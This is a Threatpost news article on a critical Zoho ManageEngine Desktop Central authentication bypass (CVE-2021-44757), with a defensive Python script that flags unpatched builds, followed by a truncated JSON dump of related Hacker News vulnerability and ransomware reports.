A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the company has warned.
The bug (CVE-2021-44757) could allow a remote user to “perform unauthorized actions in the server,” according to the company’s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). “If exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.”
Zoho’s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, and imaging and deploying operating systems, according to the company’s [documentation](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>). It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more.
On the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality.
As such, the platform has far-reaching access into an organization’s IT footprint, so an exploit that lets an attacker read unauthorized data could expose a great deal of sensitive information. The arbitrary .ZIP write matters just as much: Desktop Central can [deploy software packaged as .ZIP files](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>), so an attacker who can plant a .ZIP on the server has a plausible route to pushing malware to every endpoint the instance manages.
In the case of the MSP version – which, as its name suggests, lets managed service providers (MSPs) offer endpoint management to their own customers – the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>): an attacker who compromises one MSP’s Desktop Central MSP instance could potentially reach every customer environment managed through it, depending on the controls the provider has put in place.
Zoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday; the fix ships in build 10.1.2137.9, and users are encouraged to update to that build or later. The KB article also offers tips for general hardening of Desktop Central environments.
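Because the only remediation on offer is a build upgrade, the first practical question for a defender is which servers are still on an older build. The following is an added example, not Zoho’s code, that compares Desktop Central build strings numerically against the fix build Zoho reported for CVE-2021-44757 (10.1.2137.9; confirm the threshold for your edition against the KB article before relying on it). It also handles the edge case that trips up naive inventory scripts: build strings must be compared field by field as integers, because "10.1.2137.10" sorts before "10.1.2137.9" as text and would otherwise be reported as unpatched. The hostnames and builds in the inventory are constructed sample data.

```python
"""Flag ManageEngine Desktop Central builds that predate the CVE-2021-44757 fix.

Added example, not Zoho code. FIXED_BUILD is the build Zoho reported as
remediating CVE-2021-44757; confirm it against the vendor KB for your edition
before relying on it. The inventory is constructed sample data.
"""
from __future__ import annotations

FIXED_BUILD = "10.1.2137.9"


def parse_build(build: str) -> tuple[int, ...]:
    """Split a dotted build string into a tuple of ints for numeric comparison.

    Comparing the raw strings is wrong: "10.1.2137.10" sorts *before*
    "10.1.2137.9" lexicographically even though it is the newer build, so a
    scanner doing string comparison would report the newer build as unpatched.
    """
    parts = build.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric build string: {build!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(build: str, fixed: str = FIXED_BUILD) -> bool:
    """True when `build` is older than the build that carries the fix.

    Tuple comparison is element-wise, so a shorter prefix such as
    "10.1.2137" compares as older than "10.1.2137.9".
    """
    return parse_build(build) < parse_build(fixed)


def patch_report(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Bucket hosts by whether their build still needs the CVE-2021-44757 fix.

    Hosts whose build string cannot be parsed are listed separately so an
    inventory error is not silently reported as 'patched'.
    """
    report: dict[str, list[str]] = {"needs_patch": [], "patched": [], "unknown": []}
    for host, build in sorted(inventory.items()):
        try:
            bucket = "needs_patch" if is_vulnerable(build) else "patched"
        except ValueError:
            bucket = "unknown"
        report[bucket].append(host)
    return report


# Constructed sample inventory (hostname -> build as shown in the admin console);
# not taken from any real environment.
SAMPLE_INVENTORY = {
    "dc-hq.example.internal": "10.1.2127.17",
    "dc-msp.example.internal": "10.1.2137.3",
    "dc-lab.example.internal": "10.1.2137.9",
    "dc-new.example.internal": "10.1.2137.10",
    "dc-old.example.internal": "unknown",
}

if __name__ == "__main__":
    for bucket, hosts in patch_report(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Run it as a script to print the three buckets, or import `patch_report` and feed it the build strings collected from each server’s admin console. Entries that do not parse land in `unknown` rather than being treated as patched, which is the failure mode you want to surface when an inventory field is blank or hand-typed.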
## **Zoho ManageEngine: Popular for Zero-Day Attacks**
The company didn’t say whether the bug has been exploited as a zero-day, but it’s a good bet that attackers will target it if they haven’t already: the ManageEngine platform is a popular target, given the breadth of access it provides into managed environments.
This played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users’ Active Directory (AD) and cloud accounts. But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA).
In December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges – with an ultimate goal of dropping malware onto organizations’ networks.
*Article record:* Threatpost, “Critical ManageEngine Desktop Server Bug Opens Orgs to Malware,” by Tara Seals, published 2022-01-18, https://threatpost.com/critical-manageengine-desktop-server-bug-malware/177705/. CVEs referenced: CVE-2021-40539, CVE-2021-44515, CVE-2021-44757. Severity as recorded for this entry: CVSS v3.1 base score 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
{"thn": [{"lastseen": "2022-05-09T12:37:42", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK>)\n\nEnterprise software maker Zoho on Monday issued patches for a critical security vulnerability in Desktop Central and Desktop Central MSP that a remote adversary could exploit to perform unauthorized actions in affected servers.\n\nTracked as [CVE-2021-44757](<https://nvd.nist.gov/vuln/detail/CVE-2021-44757>), the shortcoming concerns an instance of authentication bypass that \"may allow an attacker to read unauthorized data or write an arbitrary zip file on the server,\" the company [noted](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) in an advisory.\n\nOsword from SGLAB of Legendsec at Qi'anxin Group has been credited with discovering and reporting the vulnerability. 
The Indian firm said it remediated the issue in build version 10.1.2137.9.\n\nWith the latest fix, Zoho has addressed a total of four vulnerabilities over the past five months \u2014\n\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine ADSelfService Plus\n * [CVE-2021-44077](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) \u2013 Unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus, and\n * [CVE-2021-44515](<https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine Desktop Central\n\nIn light of the fact that all the three aforementioned flaws have been exploited by malicious actors, it's recommended that users apply the updates as soon as possible to mitigate any potential threats.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T05:13:00", "type": "thn", "title": "Zoho Releases Patch for Critical Flaw Affecting ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T10:03:19", "id": "THN:A29E47C7A7467A109B420FF0819814EE", "href": "https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q>)\n\nEnterprise software provider Zoho on Friday warned that 
a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months.\n\nThe issue, assigned the identifier [CVE-2021-44515](<https://nvd.nist.gov/vuln/detail/CVE-2021-44515>), is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server.\n\n\"If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution,\" Zoho [cautioned](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) in an [advisory](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>). \"As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U>)\n\nThe company has also made available an [Exploit Detection Tool](<https://downloads.zohocorp.com/dnd/Desktop_Central/XTsIm8tSrnzjXhW/detector.zip>) that will help customers identify signs of compromise in their installations.\n\nWith this development, CVE-2021-44515 joins two other vulnerabilities [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) and [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) that have been [weaponized](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) to compromise the networks of critical infrastructure organizations 
across the world.\n\nThe disclosure also comes a day after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) that CVE-2021-44077 \u2014 an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus \u2014 is being exploited to drop web shells and carry out an array of post-exploitation activities as part of a campaign dubbed \"TiltedTemple.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T05:07:00", "type": "thn", "title": "Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-04T05:09:04", "id": "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "href": 
"https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:07", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH>)\n\nAt least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. 
\"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. 
Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq>)\n\nThe U.S. 
Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities.\n\nTracked as [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, \"allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>).\n\n\"A security misconfiguration in ServiceDesk Plus led to the vulnerability,\" Zoho [noted](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) in an independent advisory published on November 22. 
\"This vulnerability can allow an adversary to execute arbitrary code and carry out any subsequent attacks.\" Zoho [addressed](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) the same flaw in versions 11306 and above on September 16, 2021.\n\nCVE-2021-44077 is also the second flaw to be exploited by the same threat actor that was formerly found [exploiting](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) a security shortcoming in Zoho's self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus ([CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>)) to compromise at least 11 organizations, according to a new report published by Palo Alto Networks' Unit 42 threat intelligence team.\n\n\"The threat actor expand[ed] its focus beyond ADSelfService Plus to other vulnerable software,\" Unit 42 researchers Robert Falcone and Peter Renals [said](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>). \"Most notably, between October 25 and November 8, the actor shifted attention to several organizations running a different Zoho product known as ManageEngine ServiceDesk Plus.\"\n\nThe attacks are believed to be orchestrated by a \"persistent and determined APT actor\" tracked by Microsoft under the moniker \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>),\" an emerging threat cluster that the tech giant says is operating out of China and has been previously observed exploiting a then zero-day flaw in SolarWinds Serv-U managed file transfer service earlier this year. 
Unit 42 is monitoring the combined activity as the \"**TiltedTemple**\" campaign.\n\nPost-exploitation activities following a successful compromise involve the actor uploading a new dropper (\"msiexec.exe\") to victim systems, which then deploys the Chinese-language JSP web shell named \"Godzilla\" for establishing persistence in those machines, echoing similar tactics used against the ADSelfService software.\n\nUnit 42 identified that there are currently over 4,700 internet-facing instances of ServiceDesk Plus globally, of which 2,900 (or 62%) spanning across the U.S., India, Russia, Great Britain, and Turkey are assessed to be vulnerable to exploitation.\n\nOver the past three months, at least two organizations have been compromised using the ManageEngine ServiceDesk Plus flaw, a number that's expected to climb further as the APT group ramps up its reconnaissance activities against technology, energy, transportation, healthcare, education, finance, and defense industries. \n\nZoho, for its part, has made available an [exploit detection tool](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) to help customers identify whether their on-premises installations have been compromised, in addition to recommending that users \"upgrade to the latest version of ServiceDesk Plus (12001) immediately\" to mitigate any potential risk arising out of exploitation.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-03T05:24:00", "type": "thn", "title": "CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077"], "modified": "2021-12-03T13:34:13", "id": "THN:60B42277F576BB78A640A9D3B976D8D8", "href": "https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "Cybersecurity researchers have disclosed a new variant of 
the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. \n\n\"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),\" Trend Micro researchers, Christoper Ordonez and Alvin Nieto, [said](<https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html>) in a Monday analysis.\n\n\"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap [NSE script](<https://nmap.org/book/man-nse.html>).\"\n\n[AvosLocker](<https://thehackernews.com/2021/08/researchers-warn-of-4-new-ransomware.html>), one of the newer ransomware families to fill the vacuum left by [REvil](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>), has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.\n\nA ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.\n\nOther targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an [advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>) released by the U.S. 
Federal Bureau of Investigation (FBI) in March 2022.\n\nTelemetry data gathered by Trend Micro [shows](<https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker>) that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.\n\nThe entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software ([CVE-2021-40539](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>)) to run an HTML application ([HTA](<https://en.wikipedia.org/wiki/HTML_Application>)) hosted on a remote server.\n\n\"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,\" the researchers explained.\n\nThis includes retrieving an ASPX web shell from the server as well as an installer for the [AnyDesk](<https://thehackernews.com/2021/05/malvertising-campaign-on-google.html>) remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.\n\nSome of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw ([CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints. 
\n\nThe batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.\n\nAlso used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company [resolved in June 2021](<https://forum.avast.com/index.php?topic=283231.0>).\n\n\"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),\" the researchers pointed out. \"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-03T05:50:00", "type": "thn", "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
